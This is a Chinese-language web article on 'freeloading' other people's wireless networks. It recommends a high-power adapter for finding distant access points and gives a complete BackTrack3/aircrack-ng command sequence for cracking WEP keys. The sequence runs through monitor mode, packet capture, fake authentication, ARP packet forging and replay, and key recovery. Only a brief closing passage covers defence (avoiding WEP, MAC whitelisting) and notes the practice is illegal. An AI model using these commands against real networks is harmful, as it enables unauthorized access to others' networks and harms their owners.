上网不花钱？无线网络蹭网技术揭秘

　　随着互联网的发展，无线网络的应用越来越广泛，很多商场、酒店已经开始提供无线上网服务。对于个人用户来说，接触无线最多的方式可能就是ADSL+无线路由器了，想必你的电脑也会搜索到很多其它接入点，这些接入点或者信号很低，或者已经加密，别人的无线网络，我们是否也能坐等享用呢？

   　 信号增强问题

    　首先，我们必须让自己“蹭网”成功的概率高些。那么提高接入点数量就成了首要问题。一般情况下，笔记本内置的无线网卡在搜寻接入点时会偏弱于外部无线网卡，另外天线问题也是一个很关键的因素，我们来看看“蹭网”族使用的无线网卡。

卡皇实物

    在国内某家网站宣传的其“卡皇”产品，声称发射功率达500mw，是普通网卡的10倍，其可视传输距离为3600米，也就是半径3600米内的接入点都会被搜索到，不管该接入点是否加密。如果你住在居民区，那周围的写字楼，商场，批发市场，住宅小区，咖啡厅包含的接入点将和你家中无线路由器发出的无线信号一样，都被这款卡皇嗅探到。

外置天线

    我们来看看这款设备有何特殊之处：采用RTL8187L芯片，功率更强，信号接收多。完美支持BT3（这个后面会讲到），可外接天线，网上售价为260元，考虑到可以常年免费上网，这个价格也不算太离谱。

    搜索到无线信号以后，我们会发现大部分接入点都是加密的，接下来就需要配合软件方式破解密码，达到免费无线上网的目的。

BackTrack3（BT3）破解密码

　　BackTrack是基于SLAX的自启动运行光盘，是基于linux发行版的系统。目前使用最多的是V3 Final版本，但这个版本对少数网卡支持存在一些问题，所以V3 Beta版本仍有部分人在使用。BackTrack集中了无线网络几乎能见到的安全和破解工具，可谓无线网络破解的百宝箱，全球各地的人使用它破解了无数的无线网络，从侧面促进了大众无线网络安全意识的迅速提高。

BackTrack3

    由于我们需要在BT3下破解，而使用的是Windows系统，所以需要在虚拟机下安装BT3CD版。安装系统类型选择Linux，空间需要大于4GB，具体安装过程与其他系统并无两样，下面主要讲解一下进入系统后的破解工作。

    打开终端窗口，输入以下命令（括号内为解释内容）：

    ifconfig -a （查看无线网卡Mac地址）

    airmon-ng start wifi0 5

    （其中wifi0是电脑里面给无线网卡的，一般都是这个，用ifconfig -a命令可以看得到。wifi0 后面的5是需要破解AP频道，可以在左下角开始菜单里面，找到第二项Internet中的无线网工具，查看AP的频道Channel。然后会看到出现一个 Ath1，格式为XXX1样式）

    airodump-ng --ivs -w name -c 5 ath1  （5和ath1根据自己的结果修改）

    aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 （XX内容为MAC地址）

    aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

    packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp （XX是网卡MAC地址，XXXXX-XXXXXX就是上次命令返回的文件名）

    aireplay-ng -2 -r mrarp -x 1024 ath1

    打开一个新的窗口，运行

    aircrack-ng -n 64 -b ap_mac name-XX.ivs（name-XX.ivs需要到桌面生成文件夹里查看，找到序号最大的那个）

    一般情况下，用不了太久，密码就会显示出来，当然只局限于破解WEP加密方式。

    防范与总结

    首先最好杜绝WEP加密方式，另外最好的办法就是在无线路由器上采取MAC绑定，对准入MAC进行白名单处理，不过这种方法不太适合公用场合的AP，但换一种加密方法还是比较容易的。

设置准入设备防止蹭网者连接无线网络

 

    对于无线破解来说并不复杂，掌握了基本的方法后破解效率觉得称得上高效，不过随着上网资费的下调，蹭网情况会越来越少，加之卡皇设备功率大，辐射也不容小视，并且从法律的角度也是不允许这种行为的。希望广大网友提高警惕，保护好自己的无线网络。